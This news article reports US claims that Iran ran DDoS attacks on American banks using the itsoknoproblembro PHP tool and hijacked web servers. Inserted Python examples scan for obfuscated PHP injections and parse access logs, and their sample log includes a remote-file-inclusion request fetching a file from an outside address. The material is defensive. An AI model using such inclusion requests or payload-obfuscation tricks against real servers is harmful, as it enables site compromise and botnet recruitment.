US gov blames Iran for cyberattacks on American banks

Itsoknoproblembro and the bRobots

Denial-of-service attacks against US banks' web systems were the work of Iran rather than Islamic activists, says a former American government official.

A group called the Izz ad-Din al-Qassam Cyber Fighters claimed responsibility for two waves of cyber-attacks against US banks, including US Bancorp, Bank of America, Citigroup and Wells Fargo, that took place in September and December. The stated reason for the "protest" attacks was religious outrage over the continued presence on YouTube of the inflammatory Innocence of Muslims video.

James A Lewis of the Center for Strategic and International Studies in Washington told the New York Times that the attacks were actually the work of Iran, rather than outraged hacktivists. He reckons the aim was actually retaliation over the deployment of Stuxnet and other cyberweapons against Iran as well as economic sanctions.

Security researchers at Arbor Networks concluded last month that in both cases attack traffic was launched from insecure websites rather than malware-infected PCs. Compromised PHP web applications and insecure WordPress installations were pressed into service as part of a PHP web server botnet, controlled by tools such as bRobot.

The skill involved in putting together the attacks, as well as the use of server-based resources, has apparently convinced US government officials that a state-sponsored entity, namely Iran, rather than hacktivists is behind the attacks. “There is no doubt within the US government that Iran is behind these attacks,” Lewis, a former official in the state and commerce departments, told the NYT. Lewis points to the volume of traffic involved in the US bank attacks (“multiple times” the amount that Russia directed at Estonia in 2007) in attempting to substantiate his arguments, but as the NYT points out, "American officials have not offered any technical evidence to back up their claims".

Security vendors are able to say that the attacks against US banks are fairly sophisticated but cannot pinpoint who developed them. “The scale, the scope and the effectiveness of these attacks have been unprecedented,” Carl Herberger, vice president of security solutions at Israel-based security firm Radware, told the NYT. “There have never been this many financial institutions under this much duress.”

Researchers at Radware discovered that cloud services and public web hosting servers* had been infected with a strain of malware, called Itsoknoproblembro. "The malware has existed for years, but the banking attacks were the first time it used data centers to attack external victims," the NYT reports, adding that Itsoknoproblembro was designed to be difficult if not impossible to trace back to command and control systems. Attackers used infected servers to disgorge attack traffic at each banking site until it slowed or collapsed, according to Radware. Peak attack traffic against US banks hit 70 Gbps.

An entry on Radware's website says that Itsoknoproblembro is a PHP-based hacker tool that has recently been customised to serve in DDoS attacks:

The 'itsoknoproblembro' tool was designed and implemented as a general purpose PHP script injected into a victim’s machine allowing the attacker to upload and execute arbitrary Perl scripts on the target’s machine.

The 'itsoknoproblembro' script injects an encrypted payload into the website's main file, index.php, in order to bypass IPS and malware gateways, allowing the attacker to upload new Perl scripts at any time.

Initial server infection is usually done by using the well-known Remote File Inclusion (RFI) technique. By uploading Perl scripts that run different DoS flood vectors, the server might act as a bot in a DDoS botnet army.

Although originally designed as a general-purpose tool, some variants of this tool found in the wild were customized to act as a proprietary DDoS tool, implementing the flood vector logic inside without the need to upload additional scripts.
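The injection into index.php described in Radware's entry above is the kind of change a file-integrity check catches early. The following Python is an added defensive illustration, not Radware's or Prolexic's code and not a signature for itsoknoproblembro: it compares a web root against a known-good hash baseline and, independently of the baseline, flags the generic obfuscation idioms (eval of a decoded string, long base64 literals, the preg_replace /e modifier) that injected PHP payloads tend to use. The file contents and the base64-wrapped marker are constructed for the example.

```python
import base64
import hashlib
import re

# Generic obfuscation idioms seen in injected PHP payloads. These are heuristics for
# triage, not a signature for any specific tool; review every hit by hand.
SUSPICIOUS = [
    (re.compile(r'eval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\('),
     "eval of decoded/inflated string"),
    (re.compile(r'preg_replace\s*\(\s*[\'"][^\'"]*/e[\'"]'),
     "preg_replace with /e modifier"),
    (re.compile(r'[\'"][A-Za-z0-9+/]{120,}={0,2}[\'"]'),
     "long base64-looking literal"),
]


def sha256_text(text):
    """Hex SHA-256 of a file's contents (files are modelled as strings here)."""
    return hashlib.sha256(text.encode()).hexdigest()


def build_baseline(files):
    """files: {path: contents}, taken from a known-clean deployment or release tarball."""
    return {path: sha256_text(body) for path, body in files.items()}


def scan_webroot(files, baseline):
    """Return (path, reason) findings for files that changed, appeared, vanished,
    or contain one of the SUSPICIOUS idioms."""
    findings = []
    for path, body in files.items():
        expected = baseline.get(path)
        if expected is None:
            findings.append((path, "file not in baseline"))
        elif sha256_text(body) != expected:
            findings.append((path, "hash mismatch"))
        for pattern, label in SUSPICIOUS:
            if pattern.search(body):
                findings.append((path, label))
    for path in baseline.keys() - files.keys():
        findings.append((path, "file missing"))
    return findings


# Constructed sample web root (hypothetical application, two small PHP files).
CLEAN = {
    "index.php": "<?php\nrequire 'config.php';\necho render_home();\n",
    "about.php": "<?php\necho render_page('about');\n",
}

# Constructed "after" state: a placeholder marker wrapped in eval(base64_decode(...))
# has been prepended to index.php. The encoded text is only a marker, not any real payload.
_MARKER = base64.b64encode(b"PAYLOAD_PLACEHOLDER " * 8).decode()
INFECTED = dict(CLEAN)
INFECTED["index.php"] = (
    "<?php eval(base64_decode('" + _MARKER + "')); ?>\n" + CLEAN["index.php"]
)

if __name__ == "__main__":
    baseline = build_baseline(CLEAN)
    print("clean scan:", scan_webroot(CLEAN, baseline))
    for path, reason in scan_webroot(INFECTED, baseline):
        print(f"{path}: {reason}")
```

In a real deployment the baseline would be stored off the web server (a compromised host can rewrite its own manifest), and the scan would walk the document root with `os.walk` rather than a dictionary; the comparison and pattern logic stay the same.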

DDoS protection service firm Prolexic launched a suite of Snort rules and a log analysis tool to defend against itsoknoproblembro last week.

Prolexic also links the threat to attacks against the US banking industry, but the tool has also been used against the energy and hosting provider industries. "The attack vectors include POST, GET, TCP and UDP floods, with and without proxies, including a so-called Kamikaze GET flood script that can repeatedly relaunch automated attacks," according to a statement by Prolexic.
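Both the RFI infection step from Radware's description and the GET/POST flood vectors Prolexic lists leave traces in ordinary web server access logs, which is what a log analysis tool of the kind Prolexic released would consume. The Python below is an added example, not Prolexic's tool (whose internals the article does not describe): it parses combined-format log lines, flags query parameters whose value is a remote URL (the classic `?page=http://host/file` RFI shape), and flags source addresses that exceed a request-rate threshold inside a sliding time window. The log lines, addresses, window and threshold are all constructed for the example.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta
from urllib.parse import parse_qsl, urlsplit

# Prefix of the Apache/nginx combined log format:
# client ident user [timestamp] "METHOD target proto" status bytes ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)
# A parameter value that is itself a remote URL is the RFI tell-tale.
REMOTE_URL = re.compile(r'^(https?|ftp)://', re.IGNORECASE)


def parse_line(line):
    """Parse one combined-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m["ip"],
        "ts": datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"),
        "method": m["method"],
        "target": m["target"],
    }


def rfi_params(target):
    """Query parameters whose value points at a remote URL. Legitimate redirect or
    callback parameters can look like this too, so treat hits as triage, not verdict."""
    query = urlsplit(target).query
    return [(k, v) for k, v in parse_qsl(query, keep_blank_values=True)
            if REMOTE_URL.match(v)]


def analyze(lines, window=timedelta(seconds=5), flood_threshold=10):
    """Return {"rfi": [(ip, param, value), ...], "floods": {ip: peak requests per window}}."""
    records = sorted((r for r in map(parse_line, lines) if r), key=lambda r: r["ts"])
    rfi_hits = []
    recent = defaultdict(deque)  # ip -> timestamps still inside the sliding window
    peak = defaultdict(int)      # ip -> largest number of requests seen in one window
    for rec in records:
        for param, value in rfi_params(rec["target"]):
            rfi_hits.append((rec["ip"], param, value))
        q = recent[rec["ip"]]
        q.append(rec["ts"])
        while rec["ts"] - q[0] > window:   # evict timestamps older than the window
            q.popleft()
        peak[rec["ip"]] = max(peak[rec["ip"]], len(q))
    floods = {ip: n for ip, n in peak.items() if n >= flood_threshold}
    return {"rfi": rfi_hits, "floods": floods}


# Constructed sample log: two ordinary requests, one RFI attempt, and a 12-request
# burst from a single source within three seconds (documentation-range addresses).
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Jan/2013:09:59:50 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [10/Jan/2013:09:59:52 +0000] "GET /about.php?lang=en HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '192.0.2.44 - - [10/Jan/2013:09:59:58 +0000] "GET /index.php?page=http://203.0.113.9/x.txt HTTP/1.1" 200 5120 "-" "curl/7.21"',
] + [
    f'198.51.100.7 - - [10/Jan/2013:10:00:{sec:02d} +0000] "GET /index.php?q={n} HTTP/1.1" 200 5120 "-" "-"'
    for n, sec in enumerate([0, 0, 0, 0, 1, 1, 1, 1, 2, 2, 2, 2])
]

if __name__ == "__main__":
    result = analyze(SAMPLE_LOG)
    for ip, param, value in result["rfi"]:
        print(f"possible RFI from {ip}: {param}={value}")
    for ip, n in result["floods"].items():
        print(f"flood suspect {ip}: {n} requests in one window")
```

The rate check only sees what reaches the web server, so for a volumetric flood it confirms which sources are hammering a site rather than stopping the traffic; the RFI check is the more valuable of the two for a hosting provider, since it catches the infection step before the server is turned into a bRobot.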

Using a cloud-based system to launch denial of service attacks rather than botnet networks of compromised PCs shows that whoever is behind the attacks is keeping up with the latest trends in technology. It's hardly evidence of state involvement, at least by itself. There's nothing in what either Prolexic, Radware or Arbor are saying to suggest the latest attacks are state-sponsored much less pointing the finger of blame towards Iran.

Nonetheless, unnamed US intelligence officials appear adamant that the Izz ad-Din al-Qassam Cyber Fighters is actually a cover for Iran. ®

Bootnote

Infected web servers are called bRobots by both Radware and Prolexic. This naming convention differentiates pwned servers from the compromised PCs (zombies, bots or drones) in conventional botnets.
